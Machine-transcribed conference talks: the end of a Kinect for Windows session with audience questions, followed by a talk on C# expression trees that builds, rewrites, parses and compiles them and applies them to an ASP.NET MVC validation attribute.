Probably don't even need the connect. Probably do with a video camera. That's pretty cool. That's not even using a connect. That's just your video camera with open CV. Yeah. Yeah, I'm just gonna take a few photos of myself. Yeah. Well, we were interviewing Martin Ewell today and, and I was downloading this thinking, yeah, I'm going to check it out. He has a, an app that he's, he wrote, put it on a Raspberry Pi with a camera and it's over the door. So he can tell when the pizza guy is delivering a pizza and it recognizes the box and the logo and it plays a song when the pizza guy is here. Like, yay, the pizza's here, whatever. Solution in search of a problem, isn't it? I have another one of those. I just got a new refrigerator from Samsung and it's got an app. So naturally I downloaded the app, right? Because it's a refrigerator and everybody's been talking about, oh, you're smart refrigerator. It's going to be so awesome. You know, you're living in the high tech world. Your refrigerator is going to be connected to the Internet and all this stuff. And I'm like, great. So I downloaded the app from my, my Google phone here, my Android phone, my Samsung Galaxy S5. It just happens to be the same brand as my refrigerator. And, and I got it all working and I swear, I spent about 45 minutes before you even realized what the app did. Right? So I get it all working and I get the fridge connected because the fridge has got a Wi-Fi thing in it, right? Great, cool. And I finally get it loaded up. It tells me the current temperature in the freezer, current temperature in the fridge. Awesome. Allows me to put it into deep freeze mode and deep fridge mode, which I guess, power freeze and power fridge, which I guess if you take like a thing of hot soup or something and put it in the fridge and go into deep whatever and it'll drop the temperature really fast so nothing warms up, you know, and it'll bring back the temperature, blah, blah, blah. Yeah, it's great. Okay, cool. I can do that for my phone, but I got to go to the fridge to put the hot stuff in there. And there's a front panel that allows me to do that. Okay? But, but I can do that for my phone. It gets better. It gets better. You can only use it on the local Wi-Fi, not connected to the Internet. So the only reason to have this app is if you're too lazy to get up and go to the fridge, you've got to have the data right there in your hand in the living room. That's the American way. Yeah. Solution in search of a problem. Any other questions? What are you guys thinking of doing with this thing? Seriously, I want to know what's on your mind in terms of real world apps. You're making games, or do you really want to make a, anybody going to make a business app with this? I've heard colleagues have used it for new money applications. Oh, yeah. Because basically they're truckers in the movement of the chess. Beautiful. Instead of having to do it on the invasion of the teacher, they project like a chess board onto a president's chess. Nice. And then they can see you go up and down and analyze the breathing. Wow, great. That's what made us a colleague. I'm actually working with a company in Nashville right now that's doing physical therapy, and they're doing dynamic movement assessment. Basically the person gets stands in front of the connect and they do squats, and it counts as they go up and down. One, two, three. And then, you know, checks out, you know, what their, how messed up their knees are or whatever when they go up and down. Yeah. 
So the medical world, it definitely has huge implications that they're freaking out over how amazing it is because they've done this stuff before in medicine, but they've had to, you know, put markers on the body or they've had to be in special environments where, you know, very controlled, but not anymore. $200 device. The only thing they're complaining about is the cost of the machine that's required to run it because, you know, not every laptop is powerful enough to run it. And you got to have an i7, basically, and probably a good idea to have an SSD drive, 8GB RAM. So yeah, they're looking at a desktop machine, probably $1,200. And that's like, yeah. Yeah. Do you know about any Linux support? Linux support. I don't. No, I don't know. I know that there was a port of the last, not the last SDK, but somebody did an SDK for connector windows for Linux. Yeah. Yeah. So I wouldn't be surprised if there's something. I don't know if it'll be done by Microsoft, but you know, you never know. I mean, Microsoft is living in this great world of cross-platform now, and especially Visual Studio. I'm not so sure they're crazy about Linux, but they certainly like, you know, Apple and Android stuff. Who knows? Other questions? Yeah. Time for a beer? All right. Good. Thanks a lot, guys. Oh, wait a minute. CarlFranklin.net is my blog. This is where you can download. You'll be able to download. You can download the Kinect tools. Right now, they're only available for the old SDK. But when the new one ships and I have permission, I will post everything, everything up there. Okay. So knock yourselves out. CarlFranklin.net. That's all you need to know. Okay. Thanks. I'm sorry about this. I couldn't show it to you anyway, but at least I should have known before I, you know, put it in my suitcase. Ha ha. Thank you.
|
Carl Franklin has done extensive work with the Kinect for Windows SDK v2, and now he's sharing his knowledge and code with you. He shares code to simplify Kinect development as well as GesturePak Alpha v2, which lets you record and recognize gestures in C#.
|
10.5446/50801 (DOI)
|
Okay, so does my voice work? I suppose it does. The best part is when people come in and they look at the title of the talk and then they go, oh my, and then they go somewhere else. That's excellent. Welcome to this talk on expression trees. I'm just going to show you some images. So this is me. I'm a programmer. I work for a consultancy called Computas. This is our logo. So I suppose I create technical debt for a living, and I have excellent coworkers that help clean it up. And in my spare time, I just want to show you this: I'm sort of this old school gamer kind of guy, so I like pixel art. Unfortunately, LINQPad is a great tool, but it has some limitations in its viewing of images. I just want to show you this real quick. Much better, right? It's not working that well. Okay, anyway, that's not why we're here. This is not metaprogramming, this is just an animated GIF. So let's get to it. Just to set some context and to provide sort of an agenda: I'm going to start by making some unsubstantiated claims about magic. That's why this wizard is here. And then I'm going to talk a little bit about code as data, as code, as data, and so forth. Then we're going to have a very short look at the expressions that you may be familiar with. And then, when we get through all that, we'll start to take a look at some simple expression trees. We have simple expression trees, and then we'll build expression trees by hand, and we'll have some naive examples of programming with expression trees. When we've done that, we'll go on to parsing text to build expression trees. And when we've done that, we'll have a little evil laughter moment. When we're done laughing, we'll take a look at a real-world example of expression trees. That real-world example is not going to be LINQ or IQueryable or anything like that; it's going to be a different one. I suppose that LINQ is the best-known application, and probably the reason why expression trees are in the framework, but we're going to do something else. And then finally, if we have the time, we'll have a little bit of turtles and strange loops. Okay. But yeah. So, the unsubstantiated claims about magic. This wizard here is from the SICP book, or the SICP videos even, which you should check out if you haven't. The thing is that way back, underlying the computer that we use, we have the von Neumann architecture. An important part of that is the stored program principle, which is that the program lives alongside your data. This means that we can have nice things such as programs that take other programs as their input data and produce other programs as their output data. That's called compilers. We use them. And that's quite powerful, but we're going to start very simple, I think. So I'm just going to type some things here. That's not what I want. It's a little bit eager. Even LINQPad is eager. It's not as bad as Visual Studio with ReSharper, but it's still eager. So what's the type of this expression? This is a lambda expression, right? You've seen this before. Actually the C# compiler doesn't know. That's kind of unusual. We're used to seeing an expression and being able to deduce what type it's going to be. But the type inference of the compiler is a little bit too weak here, so we have to give it some clues as to what this is. So this is something that takes two integers and produces an integer as a result. Why do we have to do that?
Well, first of all, now it compiles. I'm going to get rid of the wizard now. We can invoke it, right? It's not called f anymore, it's called add. And then I can dump it out. That's terribly small. So that's much better. So now we have, this is sort of step one of code as data. This is binary code as data. We can take a function, or a lambda expression, and we can pass it around as this value, and then we can invoke it when we want to. That's nice. We could do something else with exactly the same expression, in fact. Strings can be plussed together as well. This is the same expression, different type. This is basically why the C# compiler gives up. This is very nice because it allows us to insult two programming communities at once, right? You combine Java and script, you get JavaScript. And we know this is powerful. We've all done the LINQ thing. This is the only LINQ I'm going to do in this talk. Let's say I do something like this. Very nice. This is powerful. LINQ is great. But I'm not going to talk about LINQ. I'm going to do something else. We're going to step up the game a little bit. Another thing that I could do is have really the same thing again that I had above. Exactly the same thing. But I've given a different input to the compiler as to what this is going to be. This is not going to be a Func. It's going to be an Expression of a Func. And that's something else entirely. So let's just have a look at what LINQPad tells us that is. Actually, we should compare it to the other thing. We'll start with the lambda. And it says some basically weird stuff that's kind of hard to read, but apparently it's some sort of representation of a method. And that makes sense; that's what we use it for. This is a little bit different. We can sort of recognize the code, the source code that we had up here, and then we have some nested nodes in here. So it's a node of a lambda, and it has some parameters and a body. And you can even go into the body and see that it's a binary expression. Now binary in this context does not mean zero and one. It means something that operates on two things. It operates in this case on a right part and a left part, and that makes sense because plus operates on two things, right? X and Y. It's not entirely clear from this visualization. I mean, this gives a lot of information, but it's maybe not so intuitive. So I created a different visualization of this expression tree. It shows, I suppose, or at least in my opinion, the tree-like nature a little bit better. So it's a tree: the add would be the root node, and you have the left and the right side. I think you could get an even better impression of that if we add something else, something like this. Let's try to dump that. Actually, let's show it. So, like so. And now you can see that it actually is a tree, right? And it is a tree in the sense that these are nodes, objects that you can look at and manipulate and turn around and do things with. So that's pretty cool. Let's see where we have gotten to. I think, yeah. This is kind of cool because we get these trees that we can play with. This is an example of the compiler providing the tree for me, right?
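Roughly, what has been on screen so far boils down to something like this. It's a LINQPad-style sketch: Dump() is LINQPad's extension method, and System.Linq.Expressions is assumed to be imported; the rest is plain C#:

// The compiler can emit the same lambda as runnable code or as data:
Func<int, int, int> add = (x, y) => x + y;
Expression<Func<int, int, int>> addExpr = (x, y) => x + y;

add(2, 3).Dump();        // 5: just invoke the compiled delegate
addExpr.Dump();          // a tree: a lambda node with parameters and a body

var body = (BinaryExpression)addExpr.Body;
body.NodeType.Dump();    // ExpressionType.Add
body.Left.Dump();        // the x parameter
body.Right.Dump();       // the y parameter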
So there are these sort of, sorry, factory methods in the framework that you can use. And whenever something's in the framework, that means you're free to use it, you should use it, right? So we'll do that. So I'm going to create a parameter. I'll call it x and sort of going to represent this thing, right? So I need three of those. So y expression, z expression. And then I need, so now I have these things basically. So I need to add together the x and the y. I'm trying to reproduce this now, okay? But I'm building it by hand instead of having the compiler do it for me. So let's add the add expression. So make a binary operation. Again not zeros and ones, but things that operate on two things. So that's going to be an expression it needs. It's an expression type. One of them is add. But of course you could do something else. You could do multiply or whatever. We're going to do add. And I'm going to use the x for my left tree and the y for my right tree. And then we need the divide operation. It's another binary expression type. Divide. And then what do I want for my left tree? That's going to be the add, right? And then I need this one. So I'm almost done. Now I have the method body or the lambda body if you want. But I don't have the lambda itself. So I need to create that as well. I'm just going to give it some name. And that's going to be, let's see, how do we do this? Lambda. And I'm actually going to have to provide the type that I want it to return. Then I need to give in the body. The body is going to be another divide. And then I need the list of parameters. It's just the x and the y and the z. Okay. So now if everything went wrong and I didn't make any mistakes, I should be able to. Let's just do this here. And I'll try to see if below this text we're going to see something that's similar to what we have above. Okay. So I'm showing what the compiler gave us. And I have a text string. And then what we built ourselves. And it's broken. That's because I cannot type. So let's see. This is the divide. This is the original one. And then we have the llama text. And the same thing again. But this one we built ourselves. Okay. So now we know that we can build them ourselves. That's good, I guess. Actually, one thing that I forgot to show you is perhaps the sort of the way back. So we had the ad expression up here. And that sort of corresponds to the source code in your project. Right? So this thing is more like the compiled binary. Cool thing and sort of a vital thing in expression trees is that there is, in fact, a way to go from the source code kind of thing to the binary kind of thing. Otherwise it wouldn't be very interesting. It would be just sort of an academic exercise in building source things. What you can call compile. And when you compile, then you have sort of one of these binary things instead. So it's like stripping off this and you're left with just the funk. And then you can call it. Let's try to do that. So if everything goes okay now, I should have 25 twice, right? And yay. I can go from the source thing, which is the expression trees, to the binary thing, which is the callable lambda expression. Okay. So now, how far have we gotten in our agenda? I said that we were going to do a lambda expression, simple expression trees, build expression trees by hand. Okay. Yeah. So we've done that. Now let's see where we are. Okay. I'm going to, I haven't programmed with them yet. I'm just building them, right? So let's have an example of that. Again, flipper. 
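To recap the hand-built tree and the Compile step in code form before moving on, here is roughly what those factory-method calls look like; a sketch of what was just described, not the exact demo source.

using System;
using System.Linq.Expressions;

// build (x + y) / z by hand using the Expression factory methods
var x = Expression.Parameter(typeof(int), "x");
var y = Expression.Parameter(typeof(int), "y");
var z = Expression.Parameter(typeof(int), "z");

var add    = Expression.MakeBinary(ExpressionType.Add, x, y);       // x + y
var divide = Expression.MakeBinary(ExpressionType.Divide, add, z);  // (x + y) / z

var lambda = Expression.Lambda<Func<int, int, int, int>>(divide, x, y, z);
Console.WriteLine(lambda);               // (x, y, z) => ((x + y) / z)

// Compile strips away the "source code" wrapper and leaves a callable delegate
var compiled = lambda.Compile();
Console.WriteLine(compiled(10, 14, 2));  // 12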
In the .NET Framework, there is something called an ExpressionVisitor. An expression visitor is something that will... oh, let's just do this, just to have an expression here. This is something that will traverse this tree and allow you to do things. So you can walk the tree, look at the nodes you're in, and do things with them. And again, it's in the framework, so we should use it. Here is one very simple example. Now, these are the naive examples of programming, just to show you the concepts. The base expression visitor has these empty variants of traversing the tree but doing nothing, right? It just gives you access. So this basically implements the visitor pattern from the Gang of Four book, which has sort of gone out of favor, I think, but it's still a useful pattern occasionally. So it has all these methods that you can override to do particular things when you see nodes of particular kinds in the tree. So what I'm going to do is that when I see a binary expression, I'm obviously going to return a binary expression, but not the original one; one that I make myself. And it's going to have the same operation. So if it's an add operation, it's still going to be an add. But there will be a twist. And the twist is that, if you see here, oh, you cannot read this, but it says that it should have the left expression followed by the right expression. The twist is that we're going to do the right one first. Does this make sense? Can we predict what's going to happen? Let's try it. So I'll have the flipper, and then I will visit this thing, this lambda. That's going to return another expression to me that I can show. And we'll have the lambda here. Sorry. And we'll have the flop here. Okay. So the lambda thing has the divide, and the add on the left-hand side, and the x and the y. And the flop is similar, but it has switched all the branches. Terribly useful, right? It just shows you that you can manipulate things. And of course, you can do things like, let's get rid of these, and of course you can always compile them and invoke them with things. So this would be the lambda thing. It should have... okay, the z is going to be something low so that we get something out. So maybe 10 and 14 and 2. That should be, okay, this is 24 divided by 2. It's 12, hopefully. I'm going to have to dump it out or we're not going to see anything. And we can do the same thing with the flop. But now things are different, right? So the z should be something high and the others should not. So maybe something like this. So if we divide 90 by 3, we should get 30 back. And that doesn't work. Oh, that's because... right, the expression visitor just returns an Expression. So basically, at this point, LINQPad, or the C# compiler, cannot know that this is something that can be compiled. So I need to cast it back to what it actually is, which is a little bit horrible, but bear with me. Okay, much better. So this means that you can take one of these expression trees, mess around with it, do whatever you want, compile it, and have it run. That's pretty powerful. Right. Yeah. Oh, sorry. Yeah. Right. So the reason why I have to cast it: one part is that the visitor only gives me back an Expression, so I'm not sure what it is; the other is that the only thing you can call Compile on is one of these lambda expressions. It has to be a lambda expression.
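A sketch of what such a flipping visitor might look like; the class name and the final numbers are mine, but the shape follows the demo: override VisitBinary, keep the node type, swap the operands, and cast the result back to a lambda before compiling.

using System;
using System.Linq.Expressions;

Expression<Func<int, int, int, int>> lambda = (x, y, z) => (x + y) / z;

// Visit returns a plain Expression, so we cast it back before we can call Compile
var flipped = (Expression<Func<int, int, int, int>>)new Flipper().Visit(lambda);
Console.WriteLine(flipped);                      // (x, y, z) => (z / (y + x))

Console.WriteLine(lambda.Compile()(10, 14, 2));  // (10 + 14) / 2  = 12
Console.WriteLine(flipped.Compile()(1, 2, 90));  // 90 / (2 + 1)   = 30

// rebuilds every binary node with the same operation but the operands swapped
class Flipper : ExpressionVisitor
{
    protected override Expression VisitBinary(BinaryExpression node) =>
        Expression.MakeBinary(node.NodeType, Visit(node.Right), Visit(node.Left));
}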
It cannot be one of the parameter expressions or a constant expression or anything like that. There are a bunch of different nodes. The only one that supports compile is the lambda expression. So this actually is a lambda expression, but you don't know that because basically the if you look at this method in the expression visitor that we're calling, this thing, this is pretty generic, right? So this will accept an expression and produce some expression back. So this is the thing that we're calling. And there is no way for the program up here to know that it's actually going to be one of these. But I mean, if I passed in something else, maybe I would return something else. Maybe I had a visitor that didn't operate on lambda expression, just operated on somebody of a lambda expression or something like that. And I might put that in somewhere else and then build my lambda expression, right? Does that answer your question? Sort of. Okay, I just wanted to show you sort of a different kind of visitor that I had prepared beforehand. I didn't want to bore you with all the typing. So here's a different kind of, this is still an expression visitor, but it does something else. So what it does is, well, it has this visit lambda thing. And actually what it does is just visits the node body. So it skips all the parameters, it goes straight to the body. And then whenever it sees a binary expression, it's going to do some things. We'll look at that in a moment. When it sees a constant expression, it just picks out the value. Now, a constant would be something like zero or maybe a string or something like that. And the parameter is going to be one of these x and y or z or something like that. And I'm just going to pick out the name and push that onto a stack. So what happens here now in the binary operation is that whenever, I'm just going to visit all the rest of the tree first. And then I know that on the stack, I have a stack here, I have, the idea is that I have a representation of the entire, well, on the top of the stack it's going to be a representation of the entire right-hand side of the tree as a string. And on the, well, the next item is going to be a similar representation of the left-hand side. And then I'm just going to compose that to a string. And when I have done that, I'm just going to push it so that if there are sort of nested binary expression, this will sort of compose. I think it makes more sense if I show it how it works. Let's try that. So I've imported all of these things in here. So if I take something like, well, well, I have a method. I've hidden it. I've hidden some stuff in here, right? So I have a method called text that will call this string representation visitor and return string. Okay. So I can call it with this thing and just dump it to the screen. And I can do the same thing with the sort of flipped thing that I had. So now I have sort of this representation. And I can nest it further. I can make something more complicated, I suppose. But that's going sort of from this tree representation of the expression to a string. Wouldn't it be cool if we could go the other way around so we could sort of start at a string and then we build this tree structure? So let's try to do that. I have, now we're sort of starting to get a little bit into sort of the world of parsers and compilers and stuff like that. That's obviously where we're going to end up as well. So I have this thing called an arithmetic tokenizer. And that allows me to take something like, well, let's see. 
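For reference, the string-building visitor described above might look roughly like this; my reconstruction, not the talk's code: skip the parameters, walk the body, and keep string fragments on a stack so that nested binary expressions compose.

using System;
using System.Collections.Generic;
using System.Linq.Expressions;

Expression<Func<int, int, int, int>> lambda = (x, y, z) => (x + y) / z;
Console.WriteLine(new Stringifier().Stringify(lambda));   // ((x + y) / z)

class Stringifier : ExpressionVisitor
{
    private readonly Stack<string> _stack = new Stack<string>();

    public string Stringify(LambdaExpression lambda)
    {
        _stack.Clear();
        Visit(lambda.Body);           // skip the parameters, go straight to the body
        return _stack.Pop();
    }

    protected override Expression VisitBinary(BinaryExpression node)
    {
        Visit(node.Left);             // pushes the string for the left-hand side
        Visit(node.Right);            // pushes the string for the right-hand side
        var right = _stack.Pop();     // right was pushed last, so it comes off first
        var left = _stack.Pop();
        var op = node.NodeType == ExpressionType.Add ? "+"
               : node.NodeType == ExpressionType.Subtract ? "-"
               : node.NodeType == ExpressionType.Multiply ? "*" : "/";
        _stack.Push("(" + left + " " + op + " " + right + ")");
        return node;
    }

    protected override Expression VisitConstant(ConstantExpression node)
    {
        _stack.Push(node.Value?.ToString() ?? "null");
        return node;
    }

    protected override Expression VisitParameter(ParameterExpression node)
    {
        _stack.Push(node.Name);
        return node;
    }
}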
I'll have a llama string, just something like this. A couple of names. And I can pass this string in. And what it's going to do for me is that I have the tokenizer. I can iterate over that. So I can say, let's say, tokenizer current dump. Let's get rid of a little bit of this noise. I have these 25s up here as well. Okay, so what it's going to do is just take some string and then pick out all the tokens. So the first parenthesis is a token. This is another token. This is a token. The operation is a token, and so forth. And that's being used inside a parser that I wrote. So I have a parser for arithmetic expressions. The idea is that this parser, or we can take a look at it. Let's see. I have the parser here. This is going to take a string, and then it's going to parse. So if I see an expression that starts with a left parenthesis, then I know that I'm in one of these binary operations. So I'm going to parse a new expression. There's going to be a new expression there, so I'm going to just recurse over here. Then I know that there should be just a token, and then I'm going to parse the right-hand side, and then I'm just going to eat up the closing parenthesis. And when I'm done, I'm going to create the binary expression. Now, if it's not a start parenthesis, then it's just going to be some sort of symbol. This is very primitive. The symbol is either going to be treated as an integer, if it is, or it's going to be treated as a parameter. Right, let's try how it works. So, parser, let's see if I can have... Now, again, I'm going to have to say here what kind of expression I expect out. Otherwise, I'm not going to be able to call it. Let's try this trick again. Let's get rid of this. Okay. So what happened here? Might not be entirely obvious, actually, because we started with a string, and now I have this string again. So it's that impressive, I'm not sure. But on the way, we have this, right? So we built the expression tree first, and then we serialized it. And this means that we can do something like this, right? We can change this string, and this is going to blow up. What? Oh, it doesn't understand the operation. Let's try one that it does understand. I'm sorry, my parser is not terribly intelligent, so just going to understand these four. Okay, but so now I have the ability to parse strings and build expression trees. And of course, I can still do this. I can still do compile, and I can call it with some values like 10, 5, and 2. And it's going to display way down here. One. Amazing. This is cool, though, because now I have a parser for a very simple binary arithmetic infix thing, but I could create a different parser, right, if I wanted to. And well, I do want to. So I have a different kind of arithmetic parser that I also wrote, which accepts sort of a different kind of syntax. So let's say I wanted to add a whole bunch of numbers, and then this old syntax that I had sort of starts to get cumbersome, right? So I wanted to do like 1 plus 2, but then I, because my parser wasn't terribly intelligent, I needed to do something like this. A different way to do that would be to do something like this, right? I'm just going to say I want to plus all these numbers together. There are crazy languages in the world that write plus in this way. So let's see how this works. Now the idea is that I want to get now a representation that will allow me to add all of these numbers together. And I'm not terribly good at names. And again, I'm going to have to tell it what I'm expecting in return. 
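As an aside, here is a rough sketch of the recursive-descent infix parser just walked through; the tokenizer, the names, and the hard-wired three-integer-parameter signature are mine, not the talk's ArithmeticParser. A leading parenthesis means a binary operation; otherwise the token is a constant or a parameter.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;

// parse "((x + y) / z)", compile it, and invoke it: (10 + 14) / 2 = 12
var divide = InfixParser.Parse("((x + y) / z)", "x", "y", "z").Compile();
Console.WriteLine(divide(10, 14, 2));

static class InfixParser
{
    public static Expression<Func<int, int, int, int>> Parse(string source, params string[] names)
    {
        var parameters = names.Select(n => Expression.Parameter(typeof(int), n)).ToArray();
        // crude tokenizer: pad the parentheses with spaces and split on whitespace
        var tokens = new Queue<string>(source.Replace("(", " ( ").Replace(")", " ) ")
            .Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries));
        return Expression.Lambda<Func<int, int, int, int>>(ParseExpression(tokens, parameters), parameters);
    }

    static Expression ParseExpression(Queue<string> tokens, ParameterExpression[] parameters)
    {
        var token = tokens.Dequeue();
        if (token == "(")
        {
            var left = ParseExpression(tokens, parameters);    // recurse for the left-hand side
            var op = tokens.Dequeue();                         // the operator token
            var right = ParseExpression(tokens, parameters);   // recurse for the right-hand side
            tokens.Dequeue();                                  // eat the closing parenthesis
            var type = op == "+" ? ExpressionType.Add
                     : op == "-" ? ExpressionType.Subtract
                     : op == "*" ? ExpressionType.Multiply : ExpressionType.Divide;
            return Expression.MakeBinary(type, left, right);
        }
        // otherwise the token is either an integer constant or a parameter name
        return int.TryParse(token, out var number)
            ? (Expression)Expression.Constant(number)
            : parameters.Single(p => p.Name == token);
    }
}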
Now what am I expecting in return? Well, basically here there are no parameters, right? So it just expects something that is able to return an integer. And let's try to show that now. I'm going to get rid of this and have a look at the expression. Yep. Oh, let's get it. So what this translated into is, I mean, I have to use the operations that in the.NET framework, right? And.NET framework addition is this binary operation thing. So what the prefix arithmetic parser does is sort of translate from this representation into something that the.NET framework understands and uses. And now I can obviously do compile and, well, just invoke it. There are no parameters. And write it out. I can imagine I have to boost this up again. And 21, which is hopefully the sum of all these numbers. Okay. This now might not be completely obvious to you. But at least to me, this is sort of the evil laughter moment. I cannot spell moment, unfortunately. So it's a little less impressive. The cool thing is that now we've sort of taken a look at parsing things, building things in memory, compiling them. This means that we have sort of given ourselves the ability to inject the programming language into our runtime, right? Because this is very primitive, right? This doesn't do much interesting things at all. It just adds up numbers. But you could imagine a much more sophisticated parser here and whatever language you want here. It could even be like C sharp, right? If you were like completely insane and didn't know that Roslin existed. You could put C sharp code in here and compile it and have it run and stuff like that. Okay. So at this point, I sort of want to switch gears and turn to presentation mode. So it is time to sort of, I promised you sort of real world application. So here comes the real world application. Something you could use if you wanted to. I don't know if you're familiar with ASP.net MVC model validation. There is some nodding. So the thing with model validation is that you can have a DTO in your web application and you could annotate them with things like this. It says in this case that the username is required. And the password here is also required and it has to be at least 12 characters. I'm not going to go into sort of security discussions, but whatever. The neat thing is that when you use these expressions or these annotations or other, then you have sort of automatically without doing any lifting at all, you have client side validation and service side validation of these attributes, which is pretty cool. And there are a bunch of them. And I think the number is increasing all the time. And it covers really a lot of common use cases. So they're very nice, but they are sort of also limited to what's in the box. So if the ones that are provided doesn't do it for you, then you're sort of on your own or at least sort of. Because there are two options that you could use. You could either do a remote validation, which does service side validation sort of in the regular way. And then for the client side validation, it does an Ajax call, which is then really the service side validation pretending to be client side validation. And that sort of works. And otherwise, you can create a custom attribute. And that also works. The only thing is that it's not so cool anymore, right? Because you have to create these attributes yourself and you have to create the service side validation and the client side validation. 
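For reference, the built-in annotations described a moment ago look roughly like this (the class and property names are mine); [Required] plus a length constraint is all it takes to get both server-side and client-side validation wired up.

using System.ComponentModel.DataAnnotations;

public class LoginModel
{
    [Required]
    public string Username { get; set; }

    [Required]
    [MinLength(12)]   // at least 12 characters, as in the example on the slide
    public string Password { get; set; }
}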
And really the only thing that you gained was that you could sort of fit it into an existing framework. And it's grunt work. So sort of the business problem or the business proposition here is, is there a generic solution to this problem? What would be the ultimate approach? Could this be solved once and for all? So we don't have to create these remote attributes or custom attributes anymore. It would be the final word on data validation in ASP.net MVC. Well, then we have to sort of look at what we have to work with. So we have this custom thing and it can accept things into as input to the attribute. But it's pretty much limited what you can put in there. It's not just about, you could not, for instance, put a lambda expression in there, something that would invoke a method on your server and that makes sense because, I mean, what would you do for client side validation then? Strings are okay. And that's like the second evil laughter moment of this talk. Because we just saw that we could put strings in there and we could put programming language in there. Then you're in a good spot, right? So the idea that I got was that we could apply expression tree magic to sort of solve this once and for all. The idea is we create a DSL for expressing rules that apply to DTOs. And those are supposed to sort of cover arbitrary constraints that you are interested in. And we're going to use a list-like syntax for that. It's what's called S expressions, which is sort of the last one we saw earlier. The choice of syntax is just that it's so easy to parse and I don't really want to write a parser because writing a parser for something complex like C sharp, that's like horrible. Writing a parser for S expressions is something that I can do and it breaks just like not that often. Now why would I want to do this? Well, there is no why. This is my sort of Yoda-like quote. Either you do it or you don't. That's the thing with programming. And the other reason is that it's magic, right? Okay, so I created this attribute, custom attribute, called MK. And the goal is to have the one validation attribute that will rule all the others and sort of make all the others obsolete. So the idea here is that this thing could annotate some property and it would say that the value of this property should be greater than the value of the property A and it should be at the same time less than the value of the property B. And this, at least to me, these sort of relative comparisons, you don't have any support for that in the built-in attributes that I'm aware of. Maybe something has come up, I don't know. And inside MK, you could have constants. So you could say it should be greater than 10 or whatever. You can read the values of other properties. We saw that here. This is the values of the properties A and B. And you can do logical comparison if it's equal, it's unequal, greater, and stuff like that. Sorry, that's the comparisons operators. The logical operators would be the and and the or. And there are also some simple functions that you might find useful. So one of those simple functions would be max. This says that whatever property has this annotation should be greater than or equal to the maximum of A and B. And this would be something that you could put on a string. This here is supposed to read that the length of the string that this property is should be 5. So the dot there sort of refers to the property itself. So I don't have to write out the full name of the property. 
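The transcript doesn't spell out the attribute's exact syntax, so the following is only a guess at how such an annotation might read, based on the rules described: an S-expression where the dot stands for the annotated property itself.

public class Interval
{
    public int A { get; set; }
    public int B { get; set; }

    // hypothetical: the value of C must be greater than A and less than B
    // (MK is the talk's own ValidationAttribute; the rule syntax here is my guess)
    [MK("(and (> . A) (< . B))")]
    public int C { get; set; }
}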
And you can also do comparisons on date times because sometimes you work on date times. This one says that the value of this thing should be, the date should be after 31st of January 2006 and it should be before now. So now is another built-in function. Okay, how are we in time? Not too bad. So how would we build something like this? We have to support both the service side validation and the client side validation. So the idea is to create first the DSL, which has these expressions that I showed you. And then we're going to convert those into sort of my own AST abstract syntax tree, which is sort of similar to the expression trees. And then I'm going to use those to produce on the service side dot net expression trees, which are then compiled to dot net functions at runtime. I have to do the same thing in JavaScript as well. So I sort of have my own homebrewed way of doing that. These are a lot more flexible and unsafe in JavaScript. So you can sort of build things easily and it breaks easily. So it's a trade-off. But you can get sort of a similar validation function coming out of a bunch of ill-conceived JavaScript, basically. So let's take a look at that stepwise. So we start with something like this. The property should be greater than the sum of three other properties. And that's going to build an abstract syntax tree that looks something like this. So this is just basically two lists inside one another. This is how you sort of represent S expressions. So it says that I have this top-level list, which consists of the symbol greater than the dot and then another list, which is this thing. Now from that, I generate the dot net expression tree. And then I sort of have to expand these things because, as I said before, addition is a binary operation in dot net. And then for the JavaScript witness, I create this sort of JSON-AST thing that is then used to compose a validation function in JavaScript also at runtime. I don't think I'm going to have... I don't want to expose you to the JavaScript, but it sort of... It builds up a nested function, basically. So this now translates into a greater than function that takes the result of the read property function and this sort of nested plusing, which adds up A, B, and Z. Okay. It's time for a demo. I've been talking a lot and I haven't showed you anything that works yet. Let's see if it works. So here I have a completely artificial thing called stuff. This is my DTO. And I have a bunch of arbitrary rules on there. A lot of them are a medic in nature, I suppose, but I also do a little bit on strings. But let's just have a look and see if it works, how it works. So I have stuff. I don't quite remember the rules now, but it says now that I should respect the rule that it should be greater than or equal to 10 and less than or equal to 20. So 22 is not going to go so well. 15 is going to go well. Let's do 20. Oh, that should be less than A. Oh, man, I'm in trouble now. So maybe 10 is going to be good. Zero is not equal to the sum of A and B, so 25 is. And this is really complex. Let's see. It should be either the maximum of B and 5. So 5 is not going to work, 10 is going to work, and there was also the cop out. It's also going to work. And this should be greater than, oh, let's see. Let's do 5. And I'm going to try something. But now this says that this should be the length of this string should be less than the value inside here. So let's try that. Okay, so 4 is less than 5. It works out. Now what about this? Oh, this is kind of weird. 
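Stepping back for a moment to the server-side half of the pipeline described before the demo: the step from the AST to a compiled validator might look something like this sketch, using the "(> . (+ A B C))" example from above. The DTO, property names, and helper shape are assumptions, not the talk's actual code.

using System;
using System.Linq.Expressions;

public class Stuff
{
    public int Value { get; set; }
    public int A { get; set; }
    public int B { get; set; }
    public int C { get; set; }
}

public static class RuleCompiler
{
    // builds dto => dto.Value > ((dto.A + dto.B) + dto.C) and compiles it at runtime,
    // e.g. GreaterThanSumOfAbc()(new Stuff { Value = 10, A = 1, B = 2, C = 3 }) == true
    public static Func<Stuff, bool> GreaterThanSumOfAbc()
    {
        var dto = Expression.Parameter(typeof(Stuff), "dto");
        var sum = Expression.Add(
            Expression.Add(Expression.Property(dto, "A"), Expression.Property(dto, "B")),
            Expression.Property(dto, "C"));   // (+ A B C) expanded to nested binary adds
        var rule = Expression.GreaterThan(Expression.Property(dto, "Value"), sum);
        return Expression.Lambda<Func<Stuff, bool>>(rule, dto).Compile();
    }
}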
It says that it should be equal to foo reversed. So it has to be this. Yay! So there is one thing, though. I'm going to see if I can trick this. Because there is now a validation rule on C that says it should be the sum of A and B, but it's not, because I didn't go into the field C, so I sort of tricked it. But once I go to update, that's just tricking JavaScript. And tricking JavaScript is easy, right? Tricking.net is not so easy. So when I hit the server, I still have to respect this constraint, right? It doesn't work. And whoa, something died. Never mind. When something dies, you go to a different demo, right? So I have a different demo here. This is now just another DTO. You can look at the DTO if you want to. Person. It has these other rules, and it has a custom error message. So you can sort of, if you don't like the sort of treating your customers to S expressions, you could give it a little bit more friendly name. So maybe I try something like this name, and that's too long. I'm going to use a different name. And this works fine. Well, it doesn't work so fine. It should be, it's kind of weird if someone is predicted to die in the future, right? So let's see if it's okay to die today. It is. Yay. Big win. And the last scene, well, it has to be between birth date or death date, because otherwise it would be scary, right? So yeah, that's a different, that's another demo. And we still have a little bit of time. Maybe we should take a quick look at the code. You want to do that? Just to sort of see where we are. Now, there is this MK 